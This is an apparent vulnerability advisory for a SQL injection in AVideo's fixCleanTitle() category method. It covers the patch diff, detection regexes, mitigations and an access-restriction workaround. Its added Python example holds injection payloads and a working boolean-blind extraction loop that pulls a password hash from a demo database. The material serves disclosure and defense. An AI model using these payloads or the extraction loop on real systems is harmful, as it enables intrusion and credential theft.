CVE-2026-33770 Overview
CVE-2026-33770 is a SQL Injection vulnerability in WWBN AVideo, an open source video platform. In versions up to and including 26.0, the fixCleanTitle() static method in objects/category.php constructs a SQL SELECT query by directly interpolating both $clean_title and $id into the query string without using prepared statements or parameterized queries. An attacker who can trigger category creation or renaming with a crafted title value can inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation.
Critical Impact
Authenticated attackers with category management privileges can use this injection to query other database tables, potentially including user credentials and private video metadata. Because the affected query's result is only tested for emptiness (it is a duplicate-title check), extraction through this path is blind: the attacker infers data one true/false answer at a time from whether a crafted title is treated as already taken.
Affected Products
- WWBN AVideo versions up to and including 26.0
Discovery Timeline
- 2026-03-27 - CVE-2026-33770 published to NVD
- 2026-03-31 - Last updated in NVD database
Technical Details for CVE-2026-33770
Vulnerability Analysis
This SQL Injection vulnerability exists in the fixCleanTitle() static method within objects/category.php. The function ensures that category clean names are unique when a category is created or renamed, by selecting any existing row with the same clean_name (excluding the category's own id on rename). The vulnerable code concatenates user-controlled input ($clean_title and $id) into a raw SQL string without escaping or parameter binding.
When a user with category management privileges creates or renames a category, the title value passes through this function. A title containing a single quote closes the string literal in the query, after which the attacker can append their own SQL (for example a boolean subquery, with a comment sequence to neutralise the trailing LIMIT 1). Since the application only checks whether the query returned a row, the attacker learns one bit per request, which is enough to read data from other tables character by character or to enumerate the database schema. Whether more direct techniques (UNION output, stacked statements) are reachable depends on the database layer and is not covered by the public description.
Root Cause
The root cause is the use of direct string interpolation for constructing SQL queries instead of using prepared statements with parameterized queries. The vulnerable code builds the query by embedding $clean_title and $id variables directly into the SQL string using PHP's variable interpolation syntax ({$variable}), which provides no protection against SQL injection attacks.
Attack Vector
The attack requires network access and low-privilege authentication (PR:L). An attacker who can access the category management functionality (typically available to content moderators or administrators) can exploit this vulnerability by:
- Navigating to the category creation or editing interface
- Submitting a crafted category title containing SQL injection payloads
- The malicious input is passed to fixCleanTitle() where it gets interpolated into the SQL query
- The injected SQL executes with the privileges of the database connection
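The following is an added example, not code from AVideo or from the patch: it reproduces the pre-patch and post-patch shapes of the duplicate-title query against a constructed SQLite database (table names other than categories.clean_name/id are assumptions), and shows why an existence check is still exploitable as a blind oracle. The extraction loop is a generic boolean-based technique, not something the advisory documents.

```python
import sqlite3
import string

# Constructed in-memory schema standing in for the tables the page names.
# Only categories.id/clean_name come from the patch; the rest is assumed.
SCHEMA_AND_SEED = """
CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT, clean_name TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT);
INSERT INTO categories VALUES (1, 'Music', 'music'), (2, 'News', 'news');
INSERT INTO users VALUES (1, 'admin', 'pbkdf2$secret');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA_AND_SEED)
    return conn


def clean_title_exists_vulnerable(conn, clean_title, category_id=None):
    """Pre-patch shape: both values are interpolated straight into the SQL string."""
    sql = f"SELECT * FROM categories WHERE clean_name = '{clean_title}' "
    if category_id:
        sql += f" AND id != {category_id} "
    sql += " LIMIT 1"
    # As in fixCleanTitle(), the caller only learns whether a row came back.
    return conn.execute(sql).fetchone() is not None


def clean_title_exists_fixed(conn, clean_title, category_id=None):
    """Post-patch shape: placeholders, and the id coerced to int before binding
    (the Python equivalent of PHP's intval(): non-numeric input becomes 0)."""
    try:
        category_id = int(category_id)
    except (TypeError, ValueError):
        category_id = 0
    if category_id:
        sql = "SELECT * FROM categories WHERE clean_name = ? AND id != ? LIMIT 1"
        params = (clean_title, category_id)
    else:
        sql = "SELECT * FROM categories WHERE clean_name = ? LIMIT 1"
        params = (clean_title,)
    return conn.execute(sql, params).fetchone() is not None


def blind_extract(oracle, column, table, where, max_len=64):
    """Recover `column` one character at a time through a true/false oracle.

    oracle(title) must return whether the vulnerable query found a row, which is
    exactly what the duplicate-title check exposes to the attacker.
    """
    charset = string.ascii_letters + string.digits + "$./=+"  # no quotes: keeps payload valid
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # Close the open string literal, add a boolean subquery, then comment
            # out the rest of the original statement ("' LIMIT 1").
            payload = (f"x' OR (SELECT substr({column},{pos},1) FROM {table} "
                       f"WHERE {where}) = '{ch}' -- ")
            if oracle(payload):
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", clean_title_exists_vulnerable(db, "x' OR 1=1 -- "))
    print("fixed, tautology:     ", clean_title_exists_fixed(db, "x' OR 1=1 -- "))
    print("blind extraction:     ",
          blind_extract(lambda t: clean_title_exists_vulnerable(db, t),
                        "password", "users", "user='admin'"))
```

The $id path matters too: passing a non-numeric id such as "0 OR 1=1" into the interpolated version changes the query's logic, while the cast-plus-bind version treats it as 0 and simply falls back to the branch without the id filter.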
The following patch shows how the vulnerability was addressed by implementing prepared statements:
$original_title = $clean_title;
}
- $sql = "SELECT * FROM categories WHERE clean_name = '{$clean_title}' ";
+ $id = intval($id);
if (!empty($id)) {
- $sql .= " AND id != {$id} ";
+ $sql = "SELECT * FROM categories WHERE clean_name = ? AND id != ? LIMIT 1";
+ $res = sqlDAL::readSql($sql, "si", [$clean_title, $id], true);
+ } else {
+ $sql = "SELECT * FROM categories WHERE clean_name = ? LIMIT 1";
+ $res = sqlDAL::readSql($sql, "s", [$clean_title], true);
}
- $sql .= " LIMIT 1";
- $res = sqlDAL::readSql($sql, "", [], true);
$cleanTitleExists = sqlDAL::fetchAssoc($res);
sqlDAL::close($res);
if (!empty($cleanTitleExists)) {
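Review bot: the `$id = intval($id);` line changes which branch runs for a non-numeric id, since intval() of a string like "abc" is 0 and `!empty($id)` then fails, so the self-exclusion filter is silently dropped rather than rejected; that is safe for the injection but worth a comment or an explicit `is_numeric` check upstream so a caller bug is not masked. The "si" type string does match the bound values (string clean_name, integer id). Minor: the SELECT is duplicated across the two branches; one query with `AND id != ?` and a bound `0` for the no-id case would avoid the duplication if no category can have id 0.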
Source: GitHub Commit Update
Detection Methods for CVE-2026-33770
Indicators of Compromise
- Unusual SQL error messages in application logs related to category operations
- Database query logs showing unexpected UNION, SELECT, or subquery patterns in category-related queries
- Anomalous access patterns to the category management endpoints
- Evidence of data exfiltration or unauthorized database reads in audit logs
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect SQL injection patterns in category name parameters
- Monitor database query logs for suspicious SQL syntax including UNION-based injection signatures
- Deploy runtime application self-protection (RASP) to detect SQL injection attempts at the application layer
- Review access logs for repeated requests to category creation/editing endpoints with unusual payloads
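As an added example (not an AVideo or MySQL artifact), the detector below runs the query-log strategies above over constructed MySQL general_log style lines: it keeps only statements against the categories table, flags injection indicators (UNION SELECT, boolean subqueries, tautologies, comment truncation, timing functions), and then groups hits per connection, because a blind-extraction loop produces many near-identical statements from one session. The log lines, thread ids and column names are all constructed for the example.

```python
import re
from collections import Counter

# Constructed lines in MySQL general_log text format (timestamp, connection id,
# command, argument). These are not real AVideo or MySQL logs.
SAMPLE_QUERY_LOG = """\
2026-03-28T10:01:02.000000Z\t   12 Query\tSELECT * FROM categories WHERE clean_name = 'music'  LIMIT 1
2026-03-28T10:01:05.000000Z\t   12 Query\tSELECT * FROM categories WHERE clean_name = 'x' OR (SELECT substr(password,1,1) FROM users WHERE id=1) = 'p' -- '  LIMIT 1
2026-03-28T10:01:06.000000Z\t   12 Query\tSELECT * FROM categories WHERE clean_name = 'x' UNION SELECT 1,user,password FROM users -- '  LIMIT 1
2026-03-28T10:01:07.000000Z\t   13 Query\tSELECT * FROM videos WHERE id = 42
2026-03-28T10:01:08.000000Z\t   12 Query\tSELECT * FROM categories WHERE clean_name = 'rock-n-roll'  LIMIT 1
2026-03-28T10:01:09.000000Z\t   14 Query\tSELECT * FROM categories WHERE clean_name = 'x' OR 1=1 -- '  LIMIT 1
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<query>.*)$")
TARGET_TABLE = re.compile(r"\bFROM\s+categories\b", re.I)

# Primary indicators: any one of these flags the statement.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b", re.I),
    "boolean_subquery": re.compile(r"\b(OR|AND)\b[^;]*\(\s*SELECT\b", re.I),
    "tautology": re.compile(r"\bOR\b\s+(\d+|'[^']*')\s*=\s*(\d+|'[^']*')", re.I),
    "comment_truncation": re.compile(r"--\s|/\*"),
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\b", re.I),
}


def odd_quote_count(query):
    """Supporting signal only: a literal broken out of leaves an odd number of
    quotes, but so does a legitimately escaped apostrophe (\\'), hence not
    used on its own."""
    return query.count("'") % 2 == 1


def scan_query_log(text):
    """Return one finding per suspicious statement against the categories table."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m or not TARGET_TABLE.search(m["query"]):
            continue
        query = m["query"]
        reasons = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if reasons and odd_quote_count(query):
            reasons.append("unbalanced_quotes")
        if reasons:
            findings.append({"line": lineno, "conn": m["conn"],
                             "reasons": reasons, "query": query})
    return findings


def noisy_connections(findings, threshold=2):
    """Connection ids with at least `threshold` flagged statements."""
    counts = Counter(f["conn"] for f in findings)
    return sorted(c for c, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan_query_log(SAMPLE_QUERY_LOG)
    for h in hits:
        print(f"line {h['line']} conn {h['conn']}: {', '.join(h['reasons'])}")
    print("connections to investigate:", noisy_connections(hits))
```

The general_log is expensive on a busy instance; enable it only for the investigation window, or apply the same patterns to a slow-query log or to the application's own query logging if AVideo exposes one in your deployment.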
Monitoring Recommendations
- Enable detailed logging for all category management operations in AVideo
- Configure database auditing to track queries executed against the categories table
- Set up alerts for failed or malformed SQL queries originating from the application
- Monitor for authentication anomalies from accounts with category management privileges
How to Mitigate CVE-2026-33770
Immediate Actions Required
- Update WWBN AVideo to a version that includes commit 994cc2b3d802b819e07e6088338e8bf4e484aae4 or later
- Review database access logs for any signs of prior exploitation
- Restrict category management privileges to trusted administrators only
- Implement network-level access controls to limit exposure of the AVideo administrative interface
Patch Information
The vulnerability has been addressed in commit 994cc2b3d802b819e07e6088338e8bf4e484aae4. The fix refactors the SQL query in the fixCleanTitle() method to use prepared statements with proper parameter binding. The $id parameter is also explicitly cast to an integer using intval() as an additional defense layer. Organizations should update to a version containing this fix. Refer to the GitHub Security Advisory GHSA-584p-rpvq-35vf for official guidance.
Workarounds
- Temporarily disable category creation and renaming functionality until the patch is applied
- Implement input validation at the web server or WAF level to block SQL metacharacters in category titles
- Restrict database user permissions to limit the impact of potential SQL injection exploitation
- Place the AVideo instance behind a reverse proxy with request filtering capabilities
# Example: restrict the category management path to an admin network (temporary workaround).
# Location blocks are only valid in the main server or virtual-host configuration, not in
# .htaccess; the path below is illustrative and must be matched to the deployment's actual
# category endpoints. Require syntax is Apache 2.4 (mod_authz_core).
<LocationMatch "/admin/category">
    Require ip 192.168.1.0/24
</LocationMatch>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

